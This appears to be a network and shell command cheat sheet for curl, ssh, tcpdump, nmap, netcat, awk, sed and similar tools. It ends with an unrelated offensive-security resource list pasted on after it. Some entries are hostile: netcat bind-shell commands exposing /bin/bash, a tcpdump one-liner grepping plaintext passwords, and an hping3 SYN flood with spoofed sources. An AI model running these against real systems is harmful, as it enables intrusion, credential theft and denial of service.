* `-X` - set method
* `-A` - set user-agent
```bash
curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com
```
* `--proxy [socks5://|http://]` - set proxy server
```bash
curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf
```
* `-o` - write output to file
* `-C` - resume the transfer
###### Find your external IP address (external services)
```bash
curl ipinfo.io
curl ipinfo.io/ip
curl icanhazip.com
curl ifconfig.me/ip ; echo
```
###### Repeat URL request
```bash
# URL sequence substitution with a dummy query string:
curl -ks https://example.com/?[1-20]
# With shell 'for' loop:
for i in {1..20} ; do curl -ks https://example.com/ ; done
```
###### Check DNS and HTTP trace with headers for specific domains
```bash
### Set domains and external dns servers.
_domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1")
for _domain in "${_domain_list[@]}" ; do
printf '=%.0s' {1..48}
echo
printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain"
for _dns in "${_dns_list[@]}" ; do
# Resolve domain.
host "${_domain}" "${_dns}"
echo
done
for _proto in http https ; do
printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain"
# Get trace and http headers.
curl -Iks -A "x-agent" --location "${_proto}://${_domain}"
echo
done
done
unset _domain_list _dns_list
```
___
##### Tool: [httpie](https://httpie.org/)
```bash
http -p Hh https://www.google.com
```
* `-p` - print request and response headers
* `H` - request headers
* `B` - request body
* `h` - response headers
* `b` - response body
```bash
http -p Hh https://www.google.com --follow --verify no
```
* `-F, --follow` - follow redirects
* `--verify no` - skip SSL verification
```bash
http -p Hh https://www.google.com --follow --verify no \
--proxy http:http://127.0.0.1:16379
```
* `--proxy [http:]` - set proxy server
##### Tool: [ssh](https://www.openssh.com/)
###### Escape Sequence
```
# Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
```
###### Compare a remote file with a local file
```bash
ssh user@host cat /path/to/remotefile | diff /path/to/localfile -
```
###### SSH connection through host in the middle
```bash
ssh -t reachable_host ssh unreachable_host
```
###### Run command over SSH on remote host
```bash
cat > cmd.txt << __EOF__
cat /etc/hosts
__EOF__
ssh host -l user $(<cmd.txt)
```
###### Get public key from private key
```bash
ssh-keygen -y -f ~/.ssh/id_rsa
```
###### Get all fingerprints
```bash
ssh-keygen -l -f .ssh/known_hosts
```
###### SSH authentication with user password
```bash
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host
```
###### SSH authentication with publickey
```bash
ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host
```
###### Simple recording SSH session
```bash
function _ssh_sesslog() {
_sesdir="<path/to/session/logs>"
mkdir -p "${_sesdir}" && \
ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log"
}
# Alias:
alias ssh='_ssh_sesslog'
```
###### Using Keychain for SSH logins
```bash
### Delete all of ssh-agent's keys.
function _scl() {
/usr/bin/keychain --clear
}
### Add key to keychain.
function _scg() {
/usr/bin/keychain /path/to/private-key
source "$HOME/.keychain/$HOSTNAME-sh"
}
```
###### SSH login without processing any login scripts
```bash
ssh -tt user@host bash
```
###### SSH local port forwarding
Example 1:
```bash
# Forwarding our local 2250 port to nmap.org:443 from localhost through localhost
host1> ssh -L 2250:nmap.org:443 localhost
# Connect to the service:
host1> curl -Iks --location -X GET https://localhost:2250
```
Example 2:
```bash
# Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y
host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y
# Connect to the service:
host1> psql -U db_user -d db_dev -p 9051 -h localhost
```
* `-n` - redirects stdin from `/dev/null`
* `-N` - do not execute a remote command
* `-T` - disable pseudo-terminal allocation
###### SSH remote port forwarding
```bash
# Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y
host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y
# Connect to the service:
host2> psql -U postgres -d postgres -p 8000 -h localhost
```
___
##### Tool: [linux-dev](https://www.tldp.org/LDP/abs/html/devref1.html)
###### Testing remote connection to port
```bash
timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $?
```
* `<proto` - set protocol (tcp/udp)
* `<host>` - set remote host
* `<port>` - set destination port
###### Read and write to TCP or UDP sockets with common bash tools
```bash
exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&-
```
___
##### Tool: [tcpdump](http://www.tcpdump.org/)
###### Filter incoming (on interface) traffic (specific <ip:port>)
```bash
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443
```
* `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports)
* `-e` - print the link-level headers
* `-i [iface|any]` - set interface
* `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions)
* `host [ip|hostname]` - set host, also `[host not]`
* `[and|or]` - set logic
* `port [1-65535]` - set port number, also `[port not]`
###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file
```bash
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap
```
* `-c [num]` - capture only num number of packets
* `-w [filename]` - write packets to file, `-r [filename]` - reading from file
###### Capture all ICMP packets
```bash
tcpdump -nei eth0 icmp
```
###### Check protocol used (TCP or UDP) for service
```bash
tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP"
```
###### Display ASCII text (to parse the output using grep or other)
```bash
tcpdump -i eth0 -A -s0 port 443
```
###### Grab everything between two keywords
```bash
tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'
```
###### Grab user and pass ever plain http
```bash
tcpdump -i eth0 port http -l -A | egrep -i \
'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \
--color=auto --line-buffered -B20
```
###### Extract HTTP User Agent from HTTP request header
```bash
tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:"
```
###### Capture only HTTP GET and POST packets
```bash
tcpdump -ei eth0 -s 0 -A -vv \
'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'
```
or simply:
```bash
tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
```
###### Rotate capture files
```bash
tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200
```
* `-G <num>` - pcap will be created every `<num>` seconds
* `-C <size>` - close the current pcap and open a new one if is larger than `<size>`
###### Top hosts by packets
```bash
tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20
```
###### Excludes any RFC 1918 private address
```bash
tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))'
```
___
##### Tool: [tcpick](http://tcpick.sourceforge.net/)
###### Analyse packets in real-time
```bash
while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done
```
___
##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html)
```bash
ngrep -d eth0 "www.domain.com" port 443
```
* `-d [iface|any]` - set interface
* `[domain]` - set hostname
* `port [1-65535]` - set port number
```bash
ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443
```
* `(host [ip|hostname])` - filter by ip or hostname
* `(port [1-65535])` - filter by port number
```bash
ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443
```
* `-q` - quiet mode (only payloads)
* `-t` - added timestamps
* `-O [filename]` - save output to file, `-I [filename]` - reading from file
```bash
ngrep -d eth0 -qt 'HTTP' 'tcp'
```
* `HTTP` - show http headers
* `tcp|udp` - set protocol
* `[src|dst] host [ip|hostname]` - set direction for specific node
```bash
ngrep -l -q -d eth0 -i "User-Agent: curl*"
```
* `-l` - stdout line buffered
* `-i` - case-insensitive search
___
##### Tool: [hping3](http://www.hping.org/)
```bash
hping3 -V -p 80 -s 5050 <scan_type> www.google.com
```
* `-V|--verbose` - verbose mode
* `-p|--destport` - set destination port
* `-s|--baseport` - set source port
* `<scan_type>` - set scan type
* `-F|--fin` - set FIN flag, port open if no reply
* `-S|--syn` - set SYN flag
* `-P|--push` - set PUSH flag
* `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open)
* `-U|--urg` - set URG flag
* `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply
* `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply
```bash
hping3 -V -c 1 -1 -C 8 www.google.com
```
* `-c [num]` - packet count
* `-1` - set ICMP mode
* `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8)
```bash
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host>
```
* `--flood` - sent packets as fast as possible (don't show replies)
* `--rand-source` - random source address mode
* `-d --data` - data size
* `-w|--win` - winsize (default 64)
___
##### Tool: [nmap](https://nmap.org/)
###### Ping scans the network
```bash
nmap -sP 192.168.0.0/24
```
###### Show only open ports
```bash
nmap -F --open 192.168.0.0/24
```
###### Full TCP port scan using with service version detection
```bash
nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24
```
###### Nmap scan and pass output to Nikto
```bash
nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h -
```
###### Recon specific ip:service with Nmap NSE scripts stack
```bash
# Set variables:
_hosts="192.168.250.10"
_ports="80,443"
# Set Nmap NSE scripts stack:
_nmap_nse_scripts="+dns-brute,\
+http-auth-finder,\
+http-chrono,\
+http-cookie-flags,\
+http-cors,\
+http-cross-domain-policy,\
+http-csrf,\
+http-dombased-xss,\
+http-enum,\
+http-errors,\
+http-git,\
+http-grep,\
+http-internal-ip-disclosure,\
+http-jsonp-detection,\
+http-malware-host,\
+http-methods,\
+http-passwd,\
+http-phpself-xss,\
+http-php-version,\
+http-robots.txt,\
+http-sitemap-generator,\
+http-shellshock,\
+http-stored-xss,\
+http-title,\
+http-unsafe-output-escaping,\
+http-useragent-tester,\
+http-vhosts,\
+http-waf-detect,\
+http-waf-fingerprint,\
+http-xssed,\
+traceroute-geolocation.nse,\
+ssl-enum-ciphers,\
+whois-domain,\
+whois-ip"
# Set Nmap NSE script params:
_nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true,"
_nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges,"
_nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1"
# Perform scan:
nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts"
```
___
##### Tool: [netcat](http://netcat.sourceforge.net/)
```bash
nc -kl 5000
```
* `-l` - listen for an incoming connection
* `-k` - listening after client has disconnected
* `>filename.out` - save receive data to file (optional)
```bash
nc 192.168.0.1 5051 < filename.in
```
* `< filename.in` - send data to remote host
```bash
nc -vz 10.240.30.3 5000
```
* `-v` - verbose output
* `-z` - scan for listening daemons
```bash
nc -vzu 10.240.30.3 1-65535
```
* `-u` - scan only udp ports
###### Transfer data file (archive)
```bash
server> nc -l 5000 | tar xzvfp -
client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000
```
###### Launch remote shell
```bash
# 1)
server> nc -l 5000 -e /bin/bash
client> nc 10.240.30.3 5000
# 2)
server> rm -f /tmp/f; mkfifo /tmp/f
server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f
client> nc 10.240.30.3 5000
```
###### Simple file server
```bash
while true ; do nc -l 5000 | tar -xvf - ; done
```
###### Simple minimal HTTP Server
```bash
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done
```
###### Simple HTTP Server
> Restarts web server after each request - remove `while` condition for only single connection.
```bash
cat > index.html << __EOF__
<!doctype html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<p>
Hello! It's a site.
</p>
</body>
</html>
__EOF__
```
```bash
server> while : ; do \
(echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \
nc -l -p 5000 \
; done
```
* `-p` - port number
###### Simple HTTP Proxy (single connection)
```bash
#!/usr/bin/env bash
if [[ $# != 2 ]] ; then
printf "%s\\n" \
"usage: ./nc-proxy listen-port bk_host:bk_port"
fi
_listen_port="$1"
_bk_host=$(echo "$2" | cut -d ":" -f1)
_bk_port=$(echo "$2" | cut -d ":" -f2)
printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \
"$_listen_port" "$_bk_host" "$_bk_port"
_tmp=$(mktemp -d)
_back="$_tmp/pipe.back"
_sent="$_tmp/pipe.sent"
_recv="$_tmp/pipe.recv"
trap 'rm -rf "$_tmp"' EXIT
mkfifo -m 0600 "$_back" "$_sent" "$_recv"
sed "s/^/=> /" <"$_sent" &
sed "s/^/<= /" <"$_recv" &
nc -l -p "$_listen_port" <"$_back" | \
tee "$_sent" | \
nc "$_bk_host" "$_bk_port" | \
tee "$_recv" >"$_back"
```
```bash
server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000
lport: 8080
bk_host: 192.168.252.10
bk_port: 8000
client> http -p h 10.240.30.3:8080
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 2748
Content-Type: text/html; charset=utf-8
Date: Sun, 01 Jul 2018 20:12:08 GMT
Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT
```
###### Create a single-use TCP or UDP proxy
```bash
### TCP -> TCP
nc -l -p 2000 -c "nc [ip|hostname] 3000"
### TCP -> UDP
nc -l -p 2000 -c "nc -u [ip|hostname] 3000"
### UDP -> UDP
nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000"
### UDP -> TCP
nc -l -u -p 2000 -c "nc [ip|hostname] 3000"
```
___
##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html)
###### Testing connection to remote host (with SNI support)
```bash
gnutls-cli -p 443 google.com
```
###### Testing connection to remote host (without SNI support)
```bash
gnutls-cli --disable-sni -p 443 google.com
```
___
##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html)
###### Testing remote connection to port
```bash
socat - TCP4:10.240.30.3:22
```
* `-` - standard input (STDIO)
* `TCP4:<params>` - set tcp4 connection with specific params
* `[hostname|ip]` - set hostname/ip
* `[1-65535]` - set port number
###### Redirecting TCP-traffic to a UNIX domain socket under Linux
```bash
socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo
```
* `TCP-LISTEN:<params>` - set tcp listen with specific params
* `[1-65535]` - set port number
* `bind=[hostname|ip]` - set bind hostname/ip
* `reuseaddr` - allows other sockets to bind to an address
* `fork` - keeps the parent process attempting to produce more connections
* `su=nobody` - set user
* `range=[ip-range]` - ip range
* `UNIX-CLIENT:<params>` - communicates with the specified peer socket
* `filename` - define socket
___
##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/)
###### Set iface in promiscuous mode and dump traffic to the log file
```bash
p0f -i enp0s25 -p -d -o /dump/enp0s25.log
```
* `-i` - listen on the specified interface
* `-p` - set interface in promiscuous mode
* `-d` - fork into background
* `-o` - output file
___
##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat)
###### Graph # of connections for each hosts
```bash
netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \
sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }'
```
###### Monitor open connections for specific port including listen, count and sort it per IP
```bash
watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1"
```
###### Grab banners from local IPv4 listening ports
```bash
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"
```
___
##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync)
###### Rsync remote data as root using sudo
```bash
rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/
```
___
##### Tool: [host](https://en.wikipedia.org/wiki/Host_(Unix))
###### Resolves the domain name (using external dns server)
```bash
host google.com 9.9.9.9
```
###### Checks the domain administrator (SOA record)
```bash
host -t soa google.com 9.9.9.9
```
___
##### Tool: [dig](https://en.wikipedia.org/wiki/Dig_(command))
###### Resolves the domain name (short output)
```bash
dig google.com +short
```
###### Lookup NS record for specific domain
```bash
dig @9.9.9.9 google.com NS
```
###### Query only answer section
```bash
dig google.com +nocomments +noquestion +noauthority +noadditional +nostats
```
###### Query ALL DNS Records
```bash
dig google.com ANY +noall +answer
```
###### DNS Reverse Look-up
```bash
dig -x 172.217.16.14 +short
```
___
##### Tool: [certbot](https://certbot.eff.org/)
###### Generate multidomain certificate
```bash
certbot certonly -d example.com -d www.example.com
```
###### Generate wildcard certificate
```bash
certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com
```
###### Generate certificate with 4096 bit private key
```bash
certbot certonly -d example.com -d www.example.com --rsa-key-size 4096
```
___
##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other)
###### Get all subnets for specific AS (Autonomous system)
```bash
AS="AS32934"
whois -h whois.radb.net -- "-i origin ${AS}" | \
grep "^route:" | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]//' | \
sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]/allow /' | \
sed 's/$/;/' | \
sed 's/allow */subnet -> /g'
```
###### Resolves domain name from dns.google.com with curl and jq
```bash
_dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq .
```
##### Tool: [git](https://git-scm.com/)
###### Log alias for a decent view of your repo
```bash
# 1)
git log --oneline --decorate --graph --all
# 2)
git log --graph \
--pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \
--abbrev-commit
```
___
##### Tool: [python](https://www.python.org/)
###### Static HTTP web server
```bash
# Python 3.x
python3 -m http.server 8000 --bind 127.0.0.1
# Python 2.x
python -m SimpleHTTPServer 8000
```
###### Static HTTP web server with SSL support
```bash
# Python 3.x
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="path/to/key.pem",
certfile='path/to/cert.pem', server_side=True)
httpd.serve_forever()
# Python 2.x
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="path/tp/key.pem",
certfile='path/to/cert.pem', server_side=True)
httpd.serve_forever()
```
###### Encode base64
```bash
python -m base64 -e <<< "sample string"
```
###### Decode base64
```bash
python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg=="
```
##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html)
###### Search for matching lines
```bash
# egrep foo
awk '/foo/' filename
```
###### Search non matching lines
```bash
# egrep -v foo
awk '!/foo/' filename
```
###### Print matching lines with numbers
```bash
# egrep -n foo
awk '/foo/{print FNR,$0}' filename
```
###### Print the last column
```bash
awk '{print $NF}' filename
```
###### Find all the lines longer than 80 characters
```bash
awk 'length($0)>80{print FNR,$0}' filename
```
###### Print only lines of less than 80 characters
```bash
awk 'length < 80 filename
```
###### Print double new lines a file
```bash
awk '1; { print "" }' filename
```
###### Print line numbers
```bash
awk '{ print FNR "\t" $0 }' filename
awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner
```
###### Print line numbers for only non-blank lines
```bash
awk 'NF { $0=++a " :" $0 }; { print }' filename
```
###### Print the line and the next two (i=5) lines after the line matching regexp
```bash
awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename
```
###### Print the lines starting at the line matching 'server {' until the line matching '}'
```bash
awk '/server {/,/}/' filename
```
###### Print multiple columns with separators
```bash
awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename
```
###### Remove empty lines
```bash
awk 'NF > 0' filename
# alternative:
awk NF filename
```
###### Delete trailing white space (spaces, tabs)
```bash
awk '{sub(/[ \t]*$/, "");print}' filename
```
###### Delete leading white space
```bash
awk '{sub(/^[ \t]+/, ""); print}' filename
```
###### Remove duplicate consecutive lines
```bash
# uniq
awk 'a !~ $0{print}; {a=$0}' filename
```
###### Remove duplicate entries in a file without sorting
```bash
awk '!x[$0]++' filename
```
###### Exclude multiple columns
```bash
awk '{$1=$3=""}1' filename
```
###### Substitute foo for bar on lines matching regexp
```bash
awk '/regexp/{gsub(/foo/, "bar")};{print}' filename
```
###### Add some characters at the beginning of matching lines
```bash
awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename
```
###### Get the last hour of Apache logs
```bash
awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \
/var/log/httpd/access_log
```
___
##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html)
###### Print a specific line from a file
```bash
sed -n 10p /path/to/file
```
###### Remove a specific line from a file
```bash
sed -i 10d /path/to/file
# alternative (BSD): sed -i'' 10d /path/to/file
```
###### Remove a range of lines from a file
```bash
sed -i <file> -re '<start>,<end>d'
```
###### Replace newline(s) with a space
```bash
sed ':a;N;$!ba;s/\n/ /g' /path/to/file
# cross-platform compatible syntax:
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file
```
- `:a` create a label `a`
- `N` append the next line to the pattern space
- `$!` if not the last line, ba branch (go to) label `a`
- `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can)
Alternatives:
```bash
# perl version (sed-like speed):
perl -p -e 's/\n/ /' /path/to/file
# bash version (slow):
while read line ; do printf "%s" "$line " ; done < file
```
###### Delete string +N next lines
```bash
sed '/start/,+4d' /path/to/file
```
___
##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html)
###### Search for a "pattern" inside all files in the current directory
```bash
grep -rn "pattern"
grep -RnisI "pattern" *
fgrep "pattern" * -R
```
###### Show only for multiple patterns
```bash
grep 'INFO*'\''WARN' filename
grep 'INFO\|WARN' filename
grep -e INFO -e WARN filename
grep -E '(INFO|WARN)' filename
egrep "INFO|WARN" filename
```
###### Except multiple patterns
```bash
grep -vE '(error|critical|warning)' filename
```
###### Show data from file without comments
```bash
grep -v ^[[:space:]]*# filename
```
###### Show data from file without comments and new lines
```bash
egrep -v '#|^$' filename
```
###### Show strings with a dash/hyphen
```bash
grep -e -- filename
grep -- -- filename
grep "\-\-" filename
```
###### Remove blank lines from a file and save output to new file
```bash
grep . filename > newfilename
```
##### Tool: [perl](https://www.perl.org/)
###### Search and replace (in place)
```bash
perl -i -pe's/SEARCH/REPLACE/' filename
```
###### Edit of `*.conf` files changing all foo to bar (and backup original)
```bash
perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf
```
###### Prints the first 20 lines from `*.conf` files
```bash
perl -pe 'exit if $. > 20' *.conf
```
###### Search lines 10 to 20
```bash
perl -ne 'print if 10 .. 20' filename
```
###### Delete first 10 lines (and backup original)
```bash
perl -i.orig -ne 'print unless 1 .. 10' filename
```
###### Delete all but lines between foo and bar (and backup original)
```bash
perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename
```
###### Reduce multiple blank lines to a single line
```bash
perl -p -i -00pe0 filename
```
###### Convert tabs to spaces (1t = 2sp)
```bash
perl -p -i -e 's/\t/ /g' filename
```
###### Read input from a file and report number of lines and characters
```bash
perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename
```
#### Shell functions [<sup>[TOC]</sup>](#anger-table-of-contents)
##### Table of Contents
- [Domain resolve](#domain-resolve)
- [Get ASN](#get-asn)
###### Domain resolve
```bash
# Dependencies:
# - curl
# - jq
function DomainResolve() {
local _host="$1"
local _curl_base="curl --request GET"
local _timeout="15"
_host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \
jq '.Answer[0].data' | tr -d "\"" 2>/dev/null)
if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then
echo -en "Unsuccessful domain name resolution.\\n"
else
echo -en "$_host > $_host_ip\\n"
fi
}
```
Example:
```bash
shell> DomainResolve nmap.org
nmap.org > 45.33.49.119
shell> DomainResolve nmap.org
Unsuccessful domain name resolution.
```
###### Get ASN
```bash
# Dependencies:
# - curl
function GetASN() {
local _ip="$1"
local _curl_base="curl --request GET"
local _timeout="15"
_asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as")
_state=$(echo $?)
if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then
echo -en "Unsuccessful ASN gathering.\\n"
else
echo -en "$_ip > $_asn\\n"
fi
}
```
Example:
```bash
shell> GetASN 1.1.1.1
1.1.1.1 > AS13335 Cloudflare, Inc.
shell> GetASN 0.0.0.0
Unsuccessful ASN gathering.
```
|
# Offensive-Resources V3
((اللَّهُمَّ انْفَعْنِي بِمَا عَلَّمْتَنِي، وَعَلِّمْنِي مَا يَنْفَعُنِي، وَزِدْنِي عِلْمًا))
<hr>
# A Huge Learning Resources with Labs For Offensive Security Players.
<br>
# What is new in V3 ?
- Added Blockchain Security Section
- Added Game Hacking Section
- Added Car Hacking Section
- Added Source Code Review Section
- Added Telecom Security Section
- Added Malware Development Section
- Added VOIP security Section
- Added RFID & SDR Section
<img src="img/OffResv3.png">
<br>
<br>
# Mind Map
<img src="img/OffensiveResourcesV3.png ">
<br>
<br>
<br>
# Content
- <a href="#infrastructure">Infrastructure</a>
- <a href="#wireless">Wireless</a>
- <a href="#iot--hardware">IoT & Hardware</a>
- <a href="#ics-and-scada">ICS and SCADA</a>
- <a href="#exploit-development">Exploit Development</a>
- <a href="#web-applications">Web Applications</a>
- <a href="#mobile-applications">Mobile Applications</a>
- <a href="#api">API</a>
- <a href="#cloud">Cloud</a>
- <a href="#reverse-engineering">Reverse Engineering</a>
- <a href="#social-engineering">Social Engineering</a>
- <a href="#offensive-programming">Offensive Programming</a>
- <a href="#blockchain">Blockchain</a>
- <a href="#car-hacking">Car Hacking</a>
- <a href="#game-hacking">Game Hacking</a>
- <a href="#source-code-review">Source Code Review</a>
- <a href="#telecom">Telecom</a>
- <a href="#malware-development">Malware Development</a>
- <a href="#voip">VOIP</a>
- <a href="#rfid--sdr">RFID & SDR</a>
<br>
<br>
<br>
# Infrastructure
- Books
- <a href="https://www.amazon.com/Hackers-Handbook-Strategy-Breaking-Defending/dp/0849308887">The Hacker's Handbook</a>
- <a href="https://www.amazon.com/Advanced-Infrastructure-Penetration-Testing-methodized-ebook/dp/B076QC8FRT">Advanced Infrastructure Penetration testing</a>
- <a href="https://www.amazon.com/Peter-Kim/e/B00J12259C/ref=dp_byline_cont_book_1">Hacker playbook series</a>
- <a href="https://www.amazon.com/Art-Network-Penetration-Testing-company/dp/1617296821">The Art of Network Penetration Testing</a>
- <a href="https://www.amazon.com/Mastering-Linux-Advanced-Penetration-Testing/dp/178934056X/">Mastering Kali Linux for Advanced Penetration Testing </a>
- <a href="https://www.amazon.com/Advanced-Penetration-Testing-Highly-Secured-Environments-ebook/dp/B01A14X6LE/">Advanced Penetration Testing for Highly-Secured Environments</a>
- <a href="https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/">Advanced Penetration Testing </a>
- <a href="https://www.amazon.com/Hands-Penetration-Testing-Windows-PowerShell/dp/1788295668/">Hands-On Penetration Testing on Windows</a>
- <a href="https://www.amazon.com/Mastering-Wireless-Penetration-Testing-Environments-ebook/dp/B00T4ACP78/">Mastering Wireless Penetration Testing for Highly Secured Environments</a>
- <a href="https://www.amazon.com/Cybersecurity-state-art-organization-cybercriminals/dp/183882779X/">Cybersecurity - Attack and Defense Strategies</a>
- <a href="https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/">RTFM: Red Team Field Manual</a>
- <a href="https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641/">Penetration Testing: A Hands-on Introduction to Hacking</a>
- <a href="https://www.amazon.com/Hacking-Firewalls.../dp/B085LS67BH">Hacking: Hacking Firewalls & Bypassing Honeypot</a>
- <a href="https://www.amazon.com/Red-Team-Development-Operations-practical/dp/B083XVG633">Red Team Development and Operations: A practical guide </a>
- <a href="https://www.amazon.com/Hands-Red-Team-Tactics-operations/dp/1788995236">Hands-On Red Team Tactics</a>
- Courses
- <a href="https://www.offensive-security.com/pwk-oscp/">OSCP</a>
- <a href="https://www.offensive-security.com/pen300-osep/">OSEP</a>
- <a href="https://my.ine.com/CyberSecurity/learning-paths/9a29e89e-1327-4fe8-a201-031780263fa9/penetration-testing-professional">eCPPT</a>
- <a href="https://my.ine.com/CyberSecurity/learning-paths/154876ad-ae9f-43d6-add4-f635cab537a7/advanced-penetration-testing">eCPTX</a>
